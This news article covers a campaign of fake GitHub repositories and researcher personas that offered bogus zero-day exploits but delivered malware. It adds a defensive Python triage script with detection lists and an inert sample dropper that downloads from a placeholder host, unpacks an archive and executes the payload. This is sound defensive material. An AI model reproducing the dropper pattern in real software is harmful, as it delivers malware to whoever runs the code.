[Image caption: The threat actor created fake personas on Twitter for researchers at a non-existent security firm. Credit: BrownMantis]

In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but which instead deliver malware. The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity firms.

“The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware,” researchers from security firm VulnCheck, who found the rogue repositories, said in a report. “It’s unclear if they have been successful but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful.”

While attacks that target security researchers are not a new development, they are relatively rare and more likely to be the work of advanced persistent threat (APT) groups looking to gain access to sensitive information that researchers have access to. This was the case with a campaign reported by Google’s Threat Analysis Group in 2021, in which a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms and used them to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos. The fake accounts were used to contact other real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but this project also included a malicious DLL that deployed malware on the victim’s computer. Separately, some researchers who visited the blog had their up-to-date systems exploited, suggesting the attackers had access to some zero-day exploits.

How the GitHub fake account campaign works
VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure communications app that’s well regarded in the security community. The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.

All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security that doesn’t seem to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google. However, the 2021 attack seems to have involved significantly more sophistication than this latest campaign, and there’s no evidence it’s the work of the same attackers.

The malicious code, distributed from the rogue GitHub repositories as a file called poc.py, downloads one of two additional files depending on the operating system: cveslinux.zip or cveswindows.zip. The archive is then unpacked and the file inside is executed. The Windows payload is detected by 36 antivirus programs on VirusTotal as a trojan, while the Linux binary is flagged by 25.

“It isn’t clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021,” the VulnCheck researchers said. “Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.”

Experienced security researchers generally take precautions when working with potentially malicious code.
If they’re testing a proof-of-concept exploit, this is most likely to happen on a test system inside a virtual machine that’s well monitored and later wiped. Executing such code on a work machine would most likely be a violation of standard security policies in most organizations, especially inside a cybersecurity company.
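The review step VulnCheck recommends can be partly automated before a PoC is ever copied into the disposable VM. The script below is an added example, not code from the article, from VulnCheck or from the attacker: it parses an untrusted Python file with the standard library's `ast` module, without executing it, and reports where the three behaviours the article attributes to poc.py (download a file over the network, unpack an archive, execute the result) and OS-dependent branching appear. The SAMPLE_POC input is constructed for the demonstration and is inert; example.invalid is a placeholder host that cannot resolve, and the category name lists are the author's choice, not a published signature.

```python
"""Static first-pass triage of an untrusted proof-of-concept script.

Added example, not code from the article or from VulnCheck. It never runs the
file under review: it parses it with `ast` and reports where the three
behaviours the article attributes to poc.py appear (fetch a file over the
network, unpack an archive, execute the result), plus OS-dependent branching.
SAMPLE_POC below is a constructed, inert input; example.invalid is a
placeholder host that cannot resolve.
"""
import ast
from collections import defaultdict

# Dotted call targets grouped by the behaviour they indicate. Matching is on
# the name as written in the source, so aliased imports are not covered.
SUSPICIOUS = {
    "network_download": {
        "urllib.request.urlretrieve", "urllib.request.urlopen",
        "urlretrieve", "urlopen", "requests.get",
    },
    "archive_extract": {
        "zipfile.ZipFile", "ZipFile", "tarfile.open", "shutil.unpack_archive",
    },
    "execute_file": {
        "subprocess.Popen", "subprocess.run", "subprocess.call", "Popen",
        "os.system", "os.popen", "os.startfile", "os.execv",
    },
    "os_branching": {"platform.system", "os.name", "sys.platform"},
}


def dotted_name(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. an attribute of a call result: ZipFile(...).extractall


def triage(source):
    """Map each behaviour category to the sorted line numbers where it occurs."""
    hits = defaultdict(set)
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
        elif isinstance(node, ast.Attribute):
            name = dotted_name(node)  # bare reads such as sys.platform / os.name
        else:
            continue
        for category, names in SUSPICIOUS.items():
            if name in names:
                hits[category].add(node.lineno)
    return {category: sorted(lines) for category, lines in hits.items()}


def verdict(hits):
    """Summarise the triage: the full download -> unpack -> execute chain is the
    dropper shape the article describes; anything else still needs a human read."""
    chain = ("network_download", "archive_extract", "execute_file")
    if all(step in hits for step in chain):
        return "dropper-like: downloads, unpacks and executes a file"
    if hits:
        return "review manually: " + ", ".join(sorted(hits))
    return "no download/unpack/execute pattern found (not proof of safety)"


# Constructed sample that mimics the shape the article describes; it is only
# parsed here, never executed.
SAMPLE_POC = '''\
import platform, urllib.request, zipfile, subprocess
def exploit(target):
    print("sending crafted request to", target)  # the advertised "exploit"
name = "cveswindows.zip" if platform.system() == "Windows" else "cveslinux.zip"
urllib.request.urlretrieve("https://example.invalid/" + name, name)
zipfile.ZipFile(name).extractall("stage")
subprocess.Popen(["stage/payload"])
'''

if __name__ == "__main__":
    found = triage(SAMPLE_POC)
    for category, lines in sorted(found.items()):
        print(f"{category:17s} lines {lines}")
    print(verdict(found))
```

This is a filter for the obvious case, which is exactly what VulnCheck says this campaign is. It matches names as written, so `import subprocess as sp`, a string assembled at runtime and passed to `exec`, or a payload hidden in a compiled extension all slip past it; a clean result therefore lowers no guard, and the disposable, monitored VM remains the place where any unfamiliar PoC actually runs.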